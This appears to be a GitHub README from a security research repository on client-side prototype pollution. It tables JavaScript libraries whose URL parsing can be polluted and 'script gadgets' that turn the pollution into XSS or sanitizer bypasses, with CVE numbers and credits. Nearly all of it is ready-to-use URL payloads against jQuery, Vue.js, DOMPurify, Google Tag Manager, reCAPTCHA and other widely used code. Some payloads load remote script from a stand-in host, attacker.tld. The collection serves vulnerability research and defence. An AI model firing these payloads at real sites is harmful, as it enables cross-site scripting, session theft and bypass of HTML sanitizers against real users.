Client-Side Prototype Pollution

January 27, 2024 · View on GitHub

Intro

If you are unfamiliar with Prototype Pollution Attack, you should read the following first:
JavaScript prototype pollution attack in NodeJS by Olivier Arteau
Prototype pollution – and bypassing client-side HTML sanitizers by Michał Bentkowski

In this repository, I am trying to collect examples of libraries that are vulnerable to Prototype Pollution due to document.location parsing and useful script gadgets that can be used to demonstrate the impact.

Prototype Pollution

NamePayloadRefsFound by
Wistia Embedded Video (Fixed)?__proto__[test]=test
?__proto__.test=test		[1]William Bowling
jQuery query-object plugin
CVE-2021-20083		?__proto__[test]=test
#__proto__[test]=test		Sergey Bobrov
jQuery Sparkle
CVE-2021-20084		?__proto__.test=test
?constructor.prototype.test=test		Sergey Bobrov
V4Fire Core Library?__proto__.test=test
?__proto__[test]=test
?__proto__[test]={"json":"value"}		Sergey Bobrov
backbone-query-parameters
CVE-2021-20085		?__proto__.test=test
?constructor.prototype.test=test
?__proto__.array=1|2|3		[1]Sergey Bobrov
jQuery BBQ
CVE-2021-20086		?__proto__[test]=test
?constructor[prototype][test]=test		Sergey Bobrov
jquery-deparam
CVE-2021-20087		?__proto__[test]=test
?constructor[prototype][test]=test		Sergey Bobrov
MooTools More
CVE-2021-20088		?__proto__[test]=test
?constructor[prototype][test]=test		Sergey Bobrov
Swiftype Site Search (Fixed)#__proto__[test]=test[1]s1r1us
CanJS deparam?__proto__[test]=test
?constructor[prototype][test]=test		Rahul Maini
Purl (jQuery-URL-Parser)
CVE-2021-20089		?__proto__[test]=test
?constructor[prototype][test]=test
#__proto__[test]=test		Sergey Bobrov
HubSpot Tracking Code (Fixed)?__proto__[test]=test
?constructor[prototype][test]=test
#__proto__[test]=test		Sergey Bobrov
YUI 3 querystring-parse?constructor[prototype][test]=testSergey Bobrov
Mutiny (Fixed)?__proto__.test=testSPQR
jQuery parseParams?__proto__.test=test
?constructor.prototype.test=test		POSIX
php.js parse_str?__proto__[test]=test
?constructor[prototype][test]=test		POSIX
arg.js?__proto__[test]=test
?__proto__.test=test
?constructor[prototype][test]=test
#__proto__[test]=test		POSIX
davis.js?__proto__[test]=testPOSIX
Component querystring?__proto__[NUMBER]=test
?__proto__[123]=test		Masato Kinugawa
Aurelia path?__proto__[test]=test[1]s1r1us
analytics-utils < 1.0.3?__proto__[test]=test
?constructor[prototype][test]=test		[1]alexdaviestray

Script Gadgets

NamePayloadImpactRefsFound by
Wistia Embedded Video?__proto__[innerHTML]=<img/src/onerror%3dalert(1)>XSS[1]William Bowling
jQuery $.get?__proto__[context]=<img/src/onerror%3dalert(1)>
&__proto__[jquery]=x		XSSSergey Bobrov
jQuery $.get >= 3.0.0
Boolean.prototype		?__proto__[url][]=data:,alert(1)//
&__proto__[dataType]=script		XSSMichał Bentkowski
jQuery $.get >= 3.0.0
Boolean.prototype		?__proto__[url]=data:,alert(1)//
&__proto__[dataType]=script
&__proto__[crossDomain]=		XSSSergey Bobrov
jQuery $.getScript >= 3.4.0?__proto__[src][]=data:,alert(1)//XSSs1r1us
jQuery $.getScript 3.0.0 - 3.3.1
Boolean.prototype		?__proto__[url]=data:,alert(1)//XSSs1r1us
jQuery $(html)?__proto__[div][0]=1
&__proto__[div][1]=<img/src/onerror%3dalert(1)>		XSSSergey Bobrov
jQuery $(x).off
String.prototype		?__proto__[preventDefault]=x
&__proto__[handleObj]=x
&__proto__[delegateTarget]=<img/src/onerror%3dalert(1)>		XSSSergey Bobrov
jQuery $(x).attr?__proto__[OnError]=alert(1)
&__proto__[SRC]=fakeimagewontload.jpg		XSS[1] [2]Johan Carlsson
jQuery </span>(x).on,<span></span>(x).on, <span>(x).submit?__proto__[handler][]=x
&__proto__[selector][]=<img/src/onerror%3Dalert(1)>
&__proto__[focus]=x
&__proto__[needsContext]=x		XSS[1]Johan Carlsson
Google reCAPTCHA?__proto__[srcdoc][]=<script>alert(1)</script>XSSs1r1us
Twitter Universal Website Tag (Fixed)?__proto__[hif][]=javascript:alert(1)XSSSergey Bobrov
Tealium Universal Tag?__proto__[attrs][src]=1
&__proto__[src]=data:,alert(1)//		XSSSergey Bobrov
Akamai Boomerang?__proto__[BOOMR]=1
&__proto__[url]=//attacker.tld/js.js		XSSs1r1us
Lodash <= 4.17.15?__proto__[sourceURL]=%E2%80%A8%E2%80%A9alert(1)XSS[1]Alex Brasetvik
sanitize-html?__proto__[*][]=onloadBypass[1]Michał Bentkowski
sanitize-html?__proto__[innerText]=<script>alert(1)</script>Bypass[1]Hpdoger
js-xss?__proto__[whiteList][img][0]=onerror
&__proto__[whiteList][img][1]=src		Bypass[1]Michał Bentkowski
DOMPurify <= 2.0.12?__proto__[ALLOWED_ATTR][0]=onerror
&__proto__[ALLOWED_ATTR][1]=src		Bypass[1]Michał Bentkowski
DOMPurify <= 2.0.12?__proto__[documentMode]=9Bypass[1]Michał Bentkowski
Google Closure?__proto__[*%20ONERROR]=1
&__proto__[*%20SRC]=1		Bypass[1]Michał Bentkowski
Google Closure?__proto__[CLOSURE_BASE_PATH]=data:,alert(1)//XSS[1]Michał Bentkowski
Marionette.js / Backbone.js?__proto__[tagName]=img
&__proto__[src][]=x:
&__proto__[onerror][]=alert(1)		XSSSergey Bobrov
Adobe Dynamic Tag Management?__proto__[src]=data:,alert(1)//XSSSergey Bobrov
Adobe Dynamic Tag Management?__proto__[SRC]=<img/src/onerror%3dalert(1)>XSSSergey Bobrov
Swiftype Site Search?__proto__[xxx]=alert(1)XSSs1r1us
Embedly Cards?__proto__[onload]=alert(1)XSSGuilherme Keerok
Segment Analytics.js?__proto__[script][0]=1
&__proto__[script][1]=<img/src/onerror%3dalert(1)>		XSSSergey Bobrov
Knockout.js
Array.prototype		?__proto__[4]=a':1,[alert(1)]:1,'b
&__proto__[5]=,		XSSMichał Bentkowski
Zepto.js?__proto__[onerror]=alert(1)XSS[1]lih3iu
Zepto.js?__proto__[html]=<img/src/onerror%3dalert(1)>XSSSergey Bobrov
Sprint.js?__proto__[div][intro]=<img%20src%20onerror%3dalert(1)>XSS[1]lih3iu
Vue.js?__proto__[v-if]=_c.constructor('alert(1)')()XSSPOSIX
Vue.js?__proto__[attrs][0][name]=src
&__proto__[attrs][0][value]=xxx
&__proto__[xxx]=data:,alert(1)//
&__proto__[is]=script		XSS[1]s1r1us
Vue.js?__proto__[v-bind:class]=''.constructor.constructor('alert(1)')()XSS[1]r00timentary
Vue.js?__proto__[data]=a
&__proto__[template][nodeType]=a
&__proto__[template][innerHTML]=<script>alert(1)</script>		XSS[1]SuperGuesser
Vue.js?__proto__[props][][value]=a
&__proto__[name]=":''.constructor.constructor('alert(1)')(),"		XSS[1]st98_
Vue.js?__proto__[template]=<script>alert(1)</script>XSS[1]huli
Demandbase Tag?__proto__[Config][SiteOptimization][enabled]=1
&__proto__[Config][SiteOptimization][recommendationApiURL]=//attacker.tld/json_cors.php?		XSSSPQR
@analytics/google-tag-manager?__proto__[customScriptSrc]=//attacker.tld/xss.jsXSSSPQR
i18next?__proto__[lng]=cimode
&__proto__[appendNamespaceToCIMode]=x
&__proto__[nsSeparator]=<img/src/onerror%3dalert(1)>		Potential XSSSergey Bobrov
i18next < 19.8.5?__proto__[lng]=a
&__proto__[a]=b
&__proto__[obj]=c
&__proto__[k]=d
&__proto__[d]=<img/src/onerror%3dalert(1)>		Potential XSSSergey Bobrov
i18next >= 19.8.5?__proto__[lng]=a
&__proto__[key]=<img/src/onerror%3dalert(1)>		Potential XSSSergey Bobrov
Google Analytics?__proto__[cookieName]=COOKIE%3DInjection%3BCookie InjectionSergey Bobrov
Popper.js?__proto__[arrow][style]=color:red;transition:all%201s
&__proto__[arrow][ontransitionend]=alert(1)

?__proto__[reference][style]=color:red;transition:all%201s
&__proto__[reference][ontransitionend]=alert(2)

?__proto__[popper][style]=color:red;transition:all%201s
&__proto__[popper][ontransitionend]=alert(3)		XSS[1] [2]Matheus Vrech
Pendo Agent?__proto__[dataHost]=attacker.tld/js.js%23XSSRenwa
script.aculo.us
String.constructor		?x=x
&x[constructor][__parseStyleElement][innerHTML]=<img/src/onerror%3dalert(1)>		XSSSergey Bobrov
hCaptcha (Fixed)?__proto__[assethost]=javascript:alert(1)//XSSMasato Kinugawa
Google Closure?__proto__[trustedTypes]=x
&__proto__[emptyHTML]=<img/src/onerror%3dalert(1)>		XSSMathias Karlsson
Google Tag Manager?__proto__[vtp_enableRecaptcha]=1
&__proto__[srcdoc]=<script>alert(1)</script>		XSSterjanq
Google Tag Manager?__proto__[q][0][0]=require
&__proto__[q][0][1]=x
&__proto__[q][0][2]=https://www.google-analytics.com/gtm/js%3Fid%3DGTM-WXTDWH7		XSSSergey Bobrov /
Masato Kinugawa
Google Analytics?__proto__[q][0][0]=require
&__proto__[q][0][1]=x
&__proto__[q][0][2]=https://www.google-analytics.com/gtm/js%3Fid%3DGTM-WXTDWH7		XSSSergey Bobrov /
Masato Kinugawa